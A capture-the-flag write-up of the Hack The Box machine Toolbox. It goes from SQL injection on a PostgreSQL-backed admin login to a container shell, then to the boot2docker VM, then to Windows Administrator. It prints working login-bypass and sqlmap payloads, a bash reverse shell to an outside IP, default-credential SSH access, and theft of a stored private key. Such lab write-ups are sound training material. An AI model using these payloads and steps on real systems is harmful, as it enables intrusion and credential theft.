# Toolbox

## Reconnaissance: NMAP

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.236                     

21/tcp  open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla

22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)

135/tcp open  msrpc         Microsoft Windows RPC

139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn

443/tcp open  tcpwrapped

445/tcp open  microsoft-ds?

Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-16T02:02:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
```

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.236    

123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr

Device type: general purpose
Running: Microsoft Windows 10|2008|2012|7|8.1|Longhorn|Vista
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista:::business
```

## Enumeration: HTTPS Port 443/tcp

There’s a certificate on 443 with the domain name admin.megalogistic.com. The footer of Apache’s own error page gives the server version and, notably, a Debian build of Apache on what nmap says is a Windows host, which is the first hint that the web tier is not running directly on the box:

Apache/2.4.38 (Debian) Server \
10.10.10.236 Port 443

<https://10.10.10.236/> \
<https://10.10.10.236/index.html> \
<https://10.10.10.236/booking.html>

view-source: <https://10.10.10.236/index.html> \
Copyright ©document.write(new Date().getFullYear()); All rights reserved | This template is made with by [Colorlib](https://colorlib.com)

The site is for a shipping / logistics company: \
megalogistic.com

Most of the site is just lorem ipsum text (filler), and the forms don’t seem to submit anywhere. I could make a list of potential usernames from about.html, but it’s just names without emails, so I’ll look elsewhere first. All the pages look static at this point.

**Fuzz for VHosts:**

Given the existence of admin.megalogistic.com, I’ll fuzz the Host header to see if any other virtual hosts return something different, hiding responses of the default size (22357 characters) with --hh. Nothing turns up besides admin (the "*" hit is just a 400 for a malformed Host header):

```
┌──(kali💀kali)-[~]
└─$ wfuzz -u https://10.10.10.236 -H "Host: FUZZ.megalogistic.com" -w /usr/share/seclists/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 22357

Target: https://10.10.10.236/
Total requests: 100000
=====================================================================
ID           Response   Lines    Word       Chars       Payload                         
=====================================================================
000000036:   200        35 L     83 W       889 Ch      "admin"                         
000037212:   400        12 L     53 W       424 Ch      "*"   
```

**admin.megalogistic.com:** \
This vhost presents a login form. To reach it by name I point both hostnames at the box in /etc/hosts:\
<https://megalogistic.com/>\
<https://admin.megalogistic.com/>

```
┌──(kali💀kali)-[~/Desktop]
└─$ sudo nano /etc/hosts     

10.10.10.236	megalogistic.com
10.10.10.236	admin.megalogistic.com
```

```
┌──(kali💀kali)-[~/Desktop]
└─$ whatweb -a3 https://10.10.10.236/ -v
WhatWeb report for https://10.10.10.236/
Status    : 200 OK
Title     : MegaLogistics
IP        : 10.10.10.236
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], Bootstrap[4.1.3], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery[3.3.1], Script                                                                        

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Version      : 4.1.3
        Version      : 4.1.3
        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Version      : 3.3.1
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 16 Jan 2024 05:35:28 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Tue, 18 Feb 2020 06:51:26 GMT
        ETag: "5755-59ed419c2b780-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3570
        Connection: close
        Content-Type: text/html
```

## Enumeration: SMB Port 139/445/tcp

Anonymous access is not permitted to SMB:

```
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -N -L //10.10.10.236
session setup failed: NT_STATUS_ACCESS_DENIED
```

```
┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.236 -u '' -p '' --shares

SMB         10.10.10.236    445    TOOLBOX          [*] Windows 10.0 Build 17763 x64 (name:TOOLBOX) (domain:Toolbox) (signing:False) (SMBv1:False)
SMB         10.10.10.236    445    TOOLBOX          [-] Toolbox\: STATUS_ACCESS_DENIED 
SMB         10.10.10.236    445    TOOLBOX          [-] Error getting user: list index out of range
SMB         10.10.10.236    445    TOOLBOX          [-] Error enumerating shares: Error occurs while reading from remote(104)
```

## Enumeration: FTP Port 21/tcp

As nmap noted, anonymous login is available for FTP. I’ll give it the username anonymous and a blank password:

FileZilla ftpd \
ftp-anon: Anonymous FTP login allowed (FTP code 230)

```
┌──(kali💀kali)-[~]
└─$ cd Desktop
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ ftp 10.10.10.236  
Connected to 10.10.10.236.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.236:kali): Anonymous
331 Password required for anonymous
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
229 Entering Extended Passive Mode (|||55712|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
226 Successfully transferred "/"

ftp> get docker-toolbox.exe
local: docker-toolbox.exe remote: docker-toolbox.exe
229 Entering Extended Passive Mode (|||51982|)
150 Opening data channel for file download from server of "/docker-toolbox.exe"
100% |****************************************************|   231 MiB  232.26 KiB/s    00:00 ETA
226 Successfully transferred "/docker-toolbox.exe"
242520560 bytes received in 16:59 (232.26 KiB/s)
```

Docker Toolbox is an older solution for running Docker in Windows, before Windows had native Docker support. It basically ran a VirtualBox Linux VM that runs Docker and its containers.

{% embed url="<https://docs.bitnami.com/containers/how-to/install-docker-in-windows/>" %}

## Shell as postgres in container

**Identify SQL Injection:** \
If I try to log in with the password ', the page returns the form with a PHP warning at the top:

```
Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near "''');" LINE 1: ...FROM users WHERE username = 'admin' AND password = md5('''); ^ in /var/www/admin/index.php on line 10
Warning: pg_num_rows() expects parameter 1 to be resource, bool given in /var/www/admin/index.php on line 11
```

There are multiple things to learn from this:

* The form is vulnerable to SQL injection: the user input lands inside the query string unescaped.
* The error is from pg\_query(), which means the backend database is PostgreSQL.
* Database errors are echoed to the page, so error-based extraction is on the table, not only blind techniques.
* Passwords are compared as unsalted MD5 hashes computed inside the query.

**Bypass Login:** \
From the error above, I can guess that the SQL query being run looks like:

```
SELECT * FROM users WHERE username = '{input user}' AND password = md5('{input password}');
```

Then the site likely checks if there are results to determine if access should be allowed. If I submit the username ' or 1=1-- -, then the query will be:

```
SELECT * FROM users WHERE username = '' or 1=1-- -'' AND password = md5('anything');
```

Because -- starts a comment in PostgreSQL, everything after it (including the password check) is ignored, and 1=1 is always true, so the query returns every row and the row-count check passes. Submitting:

```
username: ' or 1=1-- -
password: admin
```

I’m at the admin dashboard, but it doesn’t do much beyond a ToDo list:

* Send credentials to Tony
* Update Printer Drivers

**Enumerate DB:**\
A login form doesn’t display data from the DB back to the page, so pulling data out means blind (or error-based) injection rather than a simple UNION. For an easy-rated box like Toolbox, I’ll turn to sqlmap. I’ll save a POST request for the login from Burp to a file with right-click, “Copy to file”. It’s important that this request not contain any injection payloads already, or sqlmap will complain.

I’ll run with -r request to give it the file to work from, --force-ssl (the site is only served over HTTPS), and --batch to accept the defaults at the prompts. It finds four injection types in the username parameter:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch

sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:

Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=admin' AND (SELECT (CASE WHEN (2512=2512) THEN NULL ELSE CAST((CHR(76)||CHR(111)||CHR(120)||CHR(115)) AS NUMERIC) END)) IS NULL AND 'mAec'='mAec&password=admin

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND 1420=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)) AS NUMERIC) AND 'nKhs'='nKhs&password=admin

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=admin';SELECT PG_SLEEP(5)--&password=admin

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=admin' AND 7695=(SELECT 7695 FROM PG_SLEEP(5)) AND 'LVhl'='LVhl&password=admin
```

I’ll add --dbs to the end of the command and run it again to list the dbs:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs 

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
```

I will list the tables in public, finding one:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public --tables

Database: public
[1 table]
+-------+
| users |
+-------+
```

Dumping the table returns a single user, admin, and their MD5 password hash. sqlmap’s built-in dictionary attack fails to crack it, and it isn’t in any online hash lookup either.

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public -T users --dump 

Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+
```
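The two steps above, the login bypass and the blind extraction of the hash, are shown below in an added example of my own (not code from the writeup or from the Toolbox box). It assumes the query shape inferred from the pg\_query() error is accurate, and it stands in an in-memory SQLite database for the real PostgreSQL backend, registering md5() and ascii() so the same PostgreSQL-style payloads run unchanged; the only row is the user sqlmap dumped. It demonstrates three things: the ' or 1=1-- - payload authenticating against the string-built query, the same payload failing against a parameterised query, and the general boolean-based blind technique behind sqlmap’s first injection point, recovering the hash one character at a time by binary search on its ASCII value:

```python
# Added example (not from the Toolbox writeup): simulated vulnerable login,
# login bypass, parameterised fix, and boolean-based blind extraction.
# Assumption: the query shape inferred from the pg_query() warning is right.
# SQLite stands in for PostgreSQL; md5()/ascii() are registered so the
# PostgreSQL-style payloads below run unchanged.
import hashlib
import sqlite3

# Constructed data: the single row sqlmap dumped from public.users.
ADMIN_HASH = "4a100a85cb5ca3616dcf137918550815"


def make_db() -> sqlite3.Connection:
    """Build the stand-in database with PostgreSQL-compatible helpers."""
    con = sqlite3.connect(":memory:")
    con.create_function("md5", 1, lambda s: hashlib.md5(s.encode()).hexdigest())
    con.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", (ADMIN_HASH,))
    return con


def vulnerable_login(con, username: str, password: str) -> bool:
    """Mirrors /var/www/admin/index.php: string-built query, then a
    row-count check (pg_num_rows > 0). A query that fails to parse counts
    as 'no rows', which is exactly what a blind oracle sees."""
    sql = (f"SELECT * FROM users WHERE username = '{username}' "
           f"AND password = md5('{password}');")
    try:
        return len(con.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False


def safe_login(con, username: str, password: str) -> bool:
    """Parameterised form: user input never reaches the SQL parser."""
    sql = "SELECT * FROM users WHERE username = ? AND password = md5(?);"
    return len(con.execute(sql, (username, password)).fetchall()) > 0


def blind_extract(oracle, column: str = "password", length: int = 32) -> str:
    """Boolean-based blind extraction. `oracle(payload)` returns True when
    the injected condition holds. Each character is recovered by binary
    search over its ASCII value: ~7 requests per character instead of
    up to 95 with a linear guess."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"ascii(substr({column},{pos},1)) > {mid}"
            # Same shape as sqlmap's payload: a true condition keeps the
            # admin row, a false one returns nothing.
            if oracle(f"admin' AND {cond} -- "):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo() -> dict:
    """Run all three demonstrations and return their results."""
    con = make_db()
    oracle = lambda payload: vulnerable_login(con, payload, "anything")
    return {
        "bypass_vulnerable": vulnerable_login(con, "' or 1=1-- -", "admin"),
        "bypass_safe": safe_login(con, "' or 1=1-- -", "admin"),
        "extracted_hash": blind_extract(oracle),
    }


if __name__ == "__main__":
    print(demo())
```

The oracle here is a local function call; against the real target it would be an HTTPS POST whose true/false signal is the difference between the dashboard and the login form, which is why sqlmap needed 64 requests just to confirm the injection points.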

**Commands via SQL:**\
One technique that rarely works, but is always worth trying, is the --os-cmd flag in sqlmap. From the docs, for PostgreSQL it uploads a shared library to the database server and registers it as user-defined functions that execute operating-system commands. That needs stacked queries (found above) and a database user privileged enough to create such functions, which is why it usually fails outside of lab boxes.

{% embed url="<https://github.com/sqlmapproject/sqlmap/wiki/Usage#run-arbitrary-operating-system-command>" %}

I’ll try whoami since it will work on either Linux or Windows, and it works:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd whoami

do you want to retrieve the command standard output? [Y/n/a] Y
[01:43:00] [INFO] retrieved: 'postgres'
```

Along the way sqlmap fingerprinted the back-end OS as Debian 10. Given this is a Windows host according to HTB, the database must be running in a Docker container. The id command works as well:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd id

do you want to retrieve the command standard output? [Y/n/a] Y
[01:45:28] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl...
command standard output: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
```

**Shell:**\
The --os-shell flag will drop into an interactive prompt to run more than one command as well:

```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-shell

[01:47:57] [INFO] retrieved: 'postgres'
command standard output: 'postgres'
os-shell> 
```

I’ll start nc and give sqlmap a Bash reverse shell to see if it works:

```
┌──(kali💀kali)-[~]
└─$ nc -lnvp 443

os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.4/443 0>&1"
```

Legacy Python is not installed, but Python3 is:

```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python -V
python -V
bash: python: command not found

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -V
python3 -V
Python 3.7.3
```

I’ll upgrade my shell using the standard trick:

```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'
```

This is important as I can’t do the next steps without a full TTY. There’s also a user.txt in postgres’ home directory (not sure why it says flag.txt in the file, but the hash works):

```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cd ~

postgres@bc56e3cc55e9:/var/lib/postgresql$ ls
11  user.txt

postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
f0183e44378ea9----------------  flag.txt
```

## Shell as docker/root in VM

**Enumeration:** \
I’m definitely not on the host machine now. ifconfig shows the IP 172.17.0.2, the first address Docker hands out on its default bridge network; the bridge gateway, 172.17.0.1, is the Docker host itself:

```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 721124  bytes 51846855 (49.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 306291  bytes 1641368970 (1.5 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 13736  bytes 4744312 (4.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13736  bytes 4744312 (4.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

The file system is quite empty.

**Docker-Toolbox:**\
At this point, a bit more detail about Docker-Toolbox is necessary. The solution is deprecated, but that doesn’t mean it can’t be seen in the wild. Docker Toolbox installs VirtualBox and creates a VM running the boot2docker Linux distribution. From its README:

{% embed url="<https://github.com/boot2docker/boot2docker#ssh-into-vm>" %}

Boot2Docker is a lightweight Linux distribution made specifically to run Docker containers. It runs completely from RAM, is a \~45MB download and boots quickly.

**sudo:**\
The same README documents the VM’s default login as user docker with password tcuser, and the VM is reachable from inside the container at the bridge gateway 172.17.0.1. The first attempt below fails only because the shell has no TTY for ssh to prompt on; after upgrading the shell, the default password works:

```
┌──(kali💀kali)-[~]
└─$ nc -lnvp 5555
listening on [any] 5555 ...

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
docker@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ sudo ssh docker@172.17.0.1
sudo ssh docker@172.17.0.1
bash: sudo: command not found

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1

docker@172.17.0.1's password: tcuser

   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net


docker@box:~$ sudo -l  
User docker may run the following commands on this host:
    (root) NOPASSWD: ALL

docker@box:~$ sudo su                                                          

root@box:/home/docker# 
```

## Shell as root

**Enumeration:** \
There’s nothing interesting in any of the homedirs on this VM. This is, as I suspected, boot2docker:

```
root@box:/home/docker# cat /etc/os-release                                     
cat /etc/os-release  
NAME=Boot2Docker
VERSION=19.03.5
ID=boot2docker
ID_LIKE=tcl
VERSION_ID=19.03.5
PRETTY_NAME="Boot2Docker 19.03.5 (TCL 10.1)"
ANSI_COLOR="1;34"
HOME_URL="https://github.com/boot2docker/boot2docker"
SUPPORT_URL="https://blog.docker.com/2016/11/introducing-docker-community-directory-docker-community-slack/"
BUG_REPORT_URL="https://github.com/boot2docker/boot2docker/issues"
```

There’s an interesting directory at the filesystem root, /c:

```
root@box:/# ls                                                                 
ls
bin           home          linuxrc       root          sys
c             init          mnt           run           tmp
dev           lib           opt           sbin          usr
etc           lib64         proc          squashfs.tgz  var

root@box:/# cd c                                                               
root@box:/c# ls                                                                
Users
```

This is the Windows C:\Users directory. Docker Toolbox shares it into the VM as a VirtualBox shared folder at /c/Users so that bind mounts from the Windows side work, which means root in the VM can read every user profile on the host:

```
root@box:/c# cd Users/                                                         

root@box:/c/Users# ls                                                          
Administrator  Default        Public         desktop.ini
All Users      Default User   Tony
```

In the Administrator’s folder, in addition to a bunch of typical Windows stuff, there’s a .ssh directory:

```
root@box:/c/Users# cd Administrator                                            

root@box:/c/Users/Administrator# ls -la                                        
total 1481
drwxrwxrwx    1 docker   staff         8192 Feb  8  2021 .
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 ..
drwxrwxrwx    1 docker   staff         4096 Jan 16 01:59 .VirtualBox
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 .docker
drwxrwxrwx    1 docker   staff            0 Feb 19  2020 .ssh
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 3D Objects
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 AppData
drwxrwxrwx    1 docker   staff            0 Feb 19  2020 Application Data
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Contacts
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Cookies
dr-xr-xr-x    1 docker   staff            0 Feb  8  2021 Desktop
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 Documents
dr-xr-xr-x    1 docker   staff            0 Apr  5  2021 Downloads
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Favorites
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Links
drwxrwxrwx    1 docker   staff         4096 Feb 18  2020 Local Settings
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Music
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 My Documents
-rwxrwxrwx    1 docker   staff       262144 Jan 11  2022 NTUSER.DAT
-rwxrwxrwx    1 docker   staff        65536 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TM.blf                                                                                  
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000001.regtrans-ms                                             
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000002.regtrans-ms                                             
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 NetHood
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Pictures
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Recent
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Saved Games
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Searches
dr-xr-xr-x    1 docker   staff            0 Sep 15  2018 SendTo
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Start Menu
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Templates
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Videos
-rwxrwxrwx    1 docker   staff        12288 Feb 18  2020 ntuser.dat.LOG1
-rwxrwxrwx    1 docker   staff        98304 Feb 18  2020 ntuser.dat.LOG2
-rwxrwxrwx    1 docker   staff           20 Feb 18  2020 ntuser.ini
```

While this is typically thought of as a Linux thing, Windows with OpenSSH (the OpenSSH for_Windows_7.7 seen on port 22) uses the same per-user .ssh directory for key-based auth and other standard SSH needs. One caveat: a default Win32-OpenSSH sshd_config ignores the per-user authorized_keys for members of Administrators in favour of a shared administrators_authorized_keys file, so if key login works for Administrator here, that default has been changed on this host. There is a key inside:

```
root@box:/c/Users/Administrator# cd .ssh                                       

root@box:/c/Users/Administrator/.ssh# ls                                       
authorized_keys  id_rsa           id_rsa.pub       known_hosts
```

diff prints nothing, so id_rsa.pub and authorized_keys are identical:

```
root@box:/c/Users/Administrator/.ssh# diff id_rsa.pub authorized_keys          
diff id_rsa.pub authorized_keys
```

ssh-keygen -y derives the public key from a private key file, and -e prints it in RFC 4716 export format. Running it on id_rsa recomputes the public half from the private key, while running it on id_rsa.pub just converts the existing public key, so comparing the two confirms that the private key matches the public one (and therefore the entry in authorized\_keys):

```
root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa               
ssh-keygen -y -e -f id_rsa  
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----

root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa.pub           
ssh-keygen -y -e -f id_rsa.pub  
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----
```

They match!

**SSH:**\
I’ll copy the private key to my local VM and set its permissions to 600, since ssh refuses to use a key file that other users can read:

```
root@box:/c/Users/Administrator/.ssh# cat id_rsa                               
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

┌──(kali💀kali)-[~/Desktop]
└─$ nano key   

┌──(kali💀kali)-[~/Desktop]
└─$ chmod 600 key
```

```
┌──(kali💀kali)-[~/Desktop]
└─$ ssh -i key administrator@10.10.10.236
The authenticity of host '10.10.10.236 (10.10.10.236)' can't be established.
ED25519 key fingerprint is SHA256:KJAib23keV2B8xvFaxg7e79uztryW+LYX+Wb2qA9u4k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.236' (ED25519) to the list of known hosts.
Microsoft Windows [Version 10.0.17763.1039]
(c) 2018 Microsoft Corporation. All rights reserved.

administrator@TOOLBOX C:\Users\Administrator>whoami
toolbox\administrator
                                                                                                       
administrator@TOOLBOX C:\Users\Administrator>cd Desktop
                                                      
administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt 
cc9a0b76ac17-----------------------  
```
